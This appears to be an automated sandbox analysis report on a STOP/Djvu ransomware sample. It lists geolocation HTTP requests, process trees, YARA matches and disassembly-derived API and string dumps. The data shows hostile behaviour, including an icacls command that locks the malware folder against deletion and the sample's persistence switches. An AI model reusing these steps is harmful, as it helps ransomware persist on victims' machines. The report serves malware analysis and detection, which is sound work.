                                                                                                                          Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-15 23:41:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49734 | 172.67.139.220 | 443 | 7708 | C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-01-15 23:41:08 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: api.2ip.ua
2024-01-15 23:41:08 UTC | 889 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 15 Jan 2024 23:41:08 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          strict-transport-security: max-age=63072000; preload
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1; mode=block; report=...
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xahW5m4yZo4K%2BXrFjHgqUGg6hUnNPaY6wJh8wzdQYaE7qtg5zedLBkIZHsk1aPCa4rcQHCGl%2Fq2KmV9ASDzpMXZswHs8O2hj5pfx%2FSDdjzCRv5Z6mHUjMeQHCIbk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8461f7be6ae97f9a-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
2024-01-15 23:41:08 UTC | 433 | IN
                                                                                                                          Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-15 23:41:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 172.67.139.220 | 443 | 7868 | C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-01-15 23:41:16 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: api.2ip.ua
2024-01-15 23:41:16 UTC | 887 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 15 Jan 2024 23:41:16 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          strict-transport-security: max-age=63072000; preload
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1; mode=block; report=...
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2F1k3LCyOF7OdPJwSfePkwyc6uWJPApleBmD7LE7Q09bPvKLOSz2x6DauSJvNlkOuIQwKZqm0l4HgJl5Fh3JHf%2BLiG9LUMvmNO55ttDAE6QrryI9tNyX2TVlPvZJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8461f7f23dc39c82-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
2024-01-15 23:41:16 UTC | 433 | IN
                                                                                                                          Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-15 23:41:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0



                                                                                                                          Target ID:0
                                                                                                                          Start time:00:40:56
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Imagebase:0x460000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1646052396.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:1
                                                                                                                          Start time:00:40:58
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:icacls "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                          Imagebase:0xe90000
                                                                                                                          File size:29'696 bytes
                                                                                                                          MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:00:40:58
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                          Imagebase:0x460000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1664627925.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:00:40:59
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe --Task
                                                                                                                          Imagebase:0xe30000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1671969796.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: unknown
                                                                                                                          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: ditekSHen
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:4
                                                                                                                          Start time:00:41:06
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
                                                                                                                          Imagebase:0xe30000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1757288854.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1745023046.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:6
                                                                                                                          Start time:00:41:15
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
                                                                                                                          Imagebase:0xe30000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1827821890.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1839495564.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:36.2%
                                                                                                                            Total number of Nodes:836
                                                                                                                            Total number of Limit Nodes:85
calls __getptd_noexit 39272->39282 39274->39272 39278 4915ae 39274->39278 39275 49158b 39283 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39275->39283 39280 4915cf wcstoxl 39278->39280 39284 48e883 GetStringTypeW 39278->39284 39281 47a36e lstrcpyW lstrcpyW 39280->39281 39285 485208 58 API calls __getptd_noexit 39280->39285 39281->38663 39282->39275 39283->39281 39284->39278 39285->39281 39287 471cf2 RegOpenKeyExW 39286->39287 39287->38968 39287->38987 39288->38977 39289->38995 39291 480241 39290->39291 39292 4802b6 39290->39292 39299 480266 39291->39299 39300 485208 58 API calls __getptd_noexit 39291->39300 39302 4802c8 60 API calls 3 library calls 39292->39302 39295 4802c3 39295->39015 39296 48024d 39301 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39296->39301 39298 480258 39298->39015 39299->39015 39300->39296 39301->39298 39302->39295 39303->39042 39304->39041 39305->39032 39308->39061 39309->39064 39310->39050 39311->39049 39314 483b4c 59 API calls 39313->39314 39315 46b164 39314->39315 39316 46b177 SysAllocString 39315->39316 39317 46b194 39315->39317 39316->39317 39317->39078 39319 46b1de 39318->39319 39321 46b202 39318->39321 39320 46b1f5 SysFreeString 39319->39320 39319->39321 39320->39321 39321->39080 39323 483add __aulldiv 39322->39323 39323->39117 39337 49035d 39324->39337 39326 48355a 39327 46d78f 39326->39327 39345 483576 39326->39345 39329 4828e0 39327->39329 39447 48279f 39329->39447 39333 46b423 39332->39333 39334 46b41d 39332->39334 39335 46b42d VariantClear 39333->39335 39334->39139 39335->39139 39336->39091 39378 48501f 58 API calls 4 library calls 39337->39378 39339 490363 39340 490369 39339->39340 39341 49038d 39339->39341 39343 488cde __malloc_crt 58 API calls 39339->39343 39340->39341 39379 485208 58 API calls __getptd_noexit 39340->39379 39341->39326 39343->39340 39344 49036e 39344->39326 39346 4835a9 _memset 39345->39346 39347 483591 39345->39347 39346->39347 39352 4835c0 39346->39352 39388 485208 58 API calls 
__getptd_noexit 39347->39388 39349 483596 39389 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39349->39389 39351 4835e9 39380 48fb64 39351->39380 39352->39351 39353 4835cb 39352->39353 39390 485208 58 API calls __getptd_noexit 39353->39390 39356 4835ee 39391 48f803 58 API calls __stricmp_l 39356->39391 39358 4835f7 39359 4837e5 39358->39359 39392 48f82d 58 API calls __stricmp_l 39358->39392 39405 4842fd 8 API calls 2 library calls 39359->39405 39362 4837ef 39363 483609 39363->39359 39393 48f857 39363->39393 39365 48361b 39365->39359 39366 483624 39365->39366 39367 48369b 39366->39367 39368 483637 39366->39368 39403 48f939 58 API calls 4 library calls 39367->39403 39400 48f939 58 API calls 4 library calls 39368->39400 39370 4836a2 39377 4835a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 39370->39377 39404 48fbb4 58 API calls 4 library calls 39370->39404 39372 48364f 39372->39377 39401 48fbb4 58 API calls 4 library calls 39372->39401 39375 483668 39375->39377 39402 48f939 58 API calls 4 library calls 39375->39402 39377->39327 39378->39339 39379->39344 39381 48fb70 __wfsopen 39380->39381 39382 48fba5 __wfsopen 39381->39382 39383 488af7 __lock 58 API calls 39381->39383 39382->39356 39384 48fb80 39383->39384 39385 48fb93 39384->39385 39406 48fe47 39384->39406 39435 48fbab LeaveCriticalSection _doexit 39385->39435 39388->39349 39389->39377 39390->39377 39391->39358 39392->39363 39394 48f861 39393->39394 39395 48f876 39393->39395 39445 485208 58 API calls __getptd_noexit 39394->39445 39395->39365 39397 48f866 39446 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39397->39446 39399 48f871 39399->39365 39400->39372 39401->39375 39402->39377 39403->39370 39404->39377 39405->39362 39407 48fe53 __wfsopen 39406->39407 39408 488af7 __lock 58 API calls 39407->39408 39409 48fe71 __tzset_nolock 39408->39409 39410 48f857 __tzset_nolock 58 API calls 39409->39410 39411 48fe86 39410->39411 39426 48ff25 __tzset_nolock __isindst_nolock 39411->39426 39436 48f803 
58 API calls __stricmp_l 39411->39436 39414 48fe98 39414->39426 39437 48f82d 58 API calls __stricmp_l 39414->39437 39415 48ff71 GetTimeZoneInformation 39415->39426 39418 48feaa 39418->39426 39438 493f99 58 API calls 2 library calls 39418->39438 39420 48ffd8 WideCharToMultiByte 39420->39426 39421 48feb8 39439 4a1667 78 API calls 3 library calls 39421->39439 39422 490010 WideCharToMultiByte 39422->39426 39425 48ff0c _strlen 39428 488cde __malloc_crt 58 API calls 39425->39428 39426->39415 39426->39420 39426->39422 39427 490157 __wfsopen __tzset_nolock __isindst_nolock 39426->39427 39433 483c2d 61 API calls __tzset_nolock 39426->39433 39434 49ff8e 58 API calls __tzset_nolock 39426->39434 39442 4842fd 8 API calls 2 library calls 39426->39442 39443 480bed 58 API calls 2 library calls 39426->39443 39444 4900d7 LeaveCriticalSection _doexit 39426->39444 39427->39385 39430 48ff1a _strlen 39428->39430 39429 48fed9 __tzset_nolock 39429->39425 39429->39426 39440 480bed 58 API calls 2 library calls 39429->39440 39430->39426 39441 48c0fd 58 API calls __stricmp_l 39430->39441 39433->39426 39434->39426 39435->39382 39436->39414 39437->39418 39438->39421 39439->39429 39440->39425 39441->39426 39442->39426 39443->39426 39444->39426 39445->39397 39446->39399 39474 48019c 39447->39474 39450 4827d4 39482 485208 58 API calls __getptd_noexit 39450->39482 39452 4827d9 39483 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39452->39483 39453 4827e9 MultiByteToWideChar 39455 482804 GetLastError 39453->39455 39456 482815 39453->39456 39484 4851e7 58 API calls 3 library calls 39455->39484 39458 488cde __malloc_crt 58 API calls 39456->39458 39459 48281d 39458->39459 39460 482825 MultiByteToWideChar 39459->39460 39461 482810 39459->39461 39460->39455 39462 48283f 39460->39462 39487 480bed 58 API calls 2 library calls 39461->39487 39464 488cde __malloc_crt 58 API calls 39462->39464 39466 48284a 39464->39466 39465 4828a0 39488 480bed 58 API calls 2 library calls 39465->39488 39466->39461 
39485 48d51e 88 API calls 3 library calls 39466->39485 39468 46d7a3 39468->39122 39470 482866 39470->39461 39471 48286f WideCharToMultiByte 39470->39471 39471->39461 39472 48288b GetLastError 39471->39472 39486 4851e7 58 API calls 3 library calls 39472->39486 39475 4801ad 39474->39475 39479 4801fa 39474->39479 39489 485007 58 API calls 2 library calls 39475->39489 39477 4801b3 39478 4801da 39477->39478 39490 4845dc 58 API calls 6 library calls 39477->39490 39478->39479 39491 48495e 58 API calls 6 library calls 39478->39491 39479->39450 39479->39453 39482->39452 39483->39468 39484->39461 39485->39470 39486->39461 39487->39465 39488->39468 39489->39477 39490->39478 39491->39479 39492->39165 39499 487e1a __wfsopen 39498->39499 39500 488af7 __lock 51 API calls 39499->39500 39501 487e21 39500->39501 39502 487e4f DecodePointer 39501->39502 39505 487eda _doexit 39501->39505 39502->39505 39506 487e66 DecodePointer 39502->39506 39518 487f28 39505->39518 39511 487e76 39506->39511 39507 487f37 __wfsopen 39507->38875 39509 487e83 EncodePointer 39509->39511 39510 487f1f 39512 487b0b _fast_error_exit 3 API calls 39510->39512 39511->39505 39511->39509 39513 487e93 DecodePointer EncodePointer 39511->39513 39514 487f28 39512->39514 39516 487ea5 DecodePointer DecodePointer 39513->39516 39515 487f35 39514->39515 39523 488c81 LeaveCriticalSection 39514->39523 39515->38875 39516->39511 39519 487f2e 39518->39519 39520 487f08 39518->39520 39524 488c81 LeaveCriticalSection 39519->39524 39520->39507 39522 488c81 LeaveCriticalSection 39520->39522 39522->39510 39523->39515 39524->39520
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046CF10: _memset.LIBCMT ref: 0046CF4A
                                                                                                                              • Part of subcall function 0046CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0046CF5F
                                                                                                                              • Part of subcall function 0046CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0046CFA6
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00479FC4
                                                                                                                            • GetLastError.KERNEL32 ref: 00479FD2
                                                                                                                            • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00479FDA
                                                                                                                            • GetLastError.KERNEL32 ref: 00479FE4
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00AB3A68,?), ref: 0047A0BB
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047A0C2
                                                                                                                            • GetCommandLineW.KERNEL32(?,?), ref: 0047A161
                                                                                                                              • Part of subcall function 004724E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004724FE
                                                                                                                              • Part of subcall function 004724E0: GetLastError.KERNEL32 ref: 00472509
                                                                                                                              • Part of subcall function 004724E0: CloseHandle.KERNEL32 ref: 0047251C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                            • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1V$list<T> too long$x*V$x2W${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7V
                                                                                                                            • API String ID: 2957410896-3258308135
                                                                                                                            • Opcode ID: 9faf03cd185ae88d214e2cefc62c984819643ff879d2467a6a216f57d7a256d3
                                                                                                                            • Instruction ID: 48c03d4a3856c862ba0d6869a8837064167bef53de054655856ab1d5f035bafb
                                                                                                                            • Opcode Fuzzy Hash: 9faf03cd185ae88d214e2cefc62c984819643ff879d2467a6a216f57d7a256d3
                                                                                                                            • Instruction Fuzzy Hash: EDD2E470504341ABD724EF25C845BDF7BE4BF91308F00891EF48987292EB799A19DB9B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046D26C
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0046D28F
                                                                                                                            • CoCreateInstance.OLE32(0053506C,00000000,00000001,00534FEC,?,?,00000000,000000FF), ref: 0046D2D5
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D2F0
